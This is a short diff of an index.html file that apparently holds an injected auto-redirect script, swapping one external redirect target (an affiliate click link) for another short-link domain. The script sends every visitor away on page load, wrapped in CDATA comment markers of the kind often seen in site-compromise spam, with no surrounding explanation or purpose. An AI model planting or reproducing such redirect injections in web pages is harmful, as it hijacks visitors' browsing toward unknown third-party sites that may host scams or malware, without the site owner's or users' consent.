--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <script><!--//--><![CDATA[// ><!--
-location.href="https://btokil.com/click?o=875&a=140"
+location.href="http://datedat.peek.link/3N81"
 //--><!]]]]><![CDATA[>
 
 //--><!
